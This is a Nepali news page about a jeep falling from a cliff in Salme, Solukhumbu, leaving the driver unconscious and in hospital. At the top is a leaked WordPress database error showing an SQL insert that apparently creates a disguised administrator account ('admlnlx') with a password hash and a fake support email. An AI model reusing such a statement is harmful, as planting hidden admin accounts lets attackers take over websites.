WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bh6obkOFK28/yWGzjWu7ZcPP47rahG1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 22:34:24', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बुको साल्मे स्थित पहलमान भित्रबाट बोलेरो खसेको छ । शनिवार साझ अन्दाजी ७ः३० बजे भिरबाट बोलेरो खस्दा चालक अन्दाजी ४०/४२ बर्षीय पुरुष घाईते भएका छन् । तर सवारी साधन भने फेला पर्न नसकेकाले खोजी कार्य जारी रहेको प्रहरीले जनाएको छ ।
प्रहरीले अचेत अवस्थामा रहेको चालकलाई दुर्घटना स्थलबाटै उद्धार गरी उपचारका लागि जिल्ला अस्पताल फाप्लु पठाइएको जिल्ला प्रहरी कार्यालय सोलुखुम्बुले जनाएको छ । जिपमा कति यात्रु थिए वा खाली थिए भन्ने बारे खुल्न सकेको छैन् । चालक बोल्न नसक्ने अवस्थामा भएकाले अनुसन्धान भईरहेको प्रहरीले जनाएको छ ।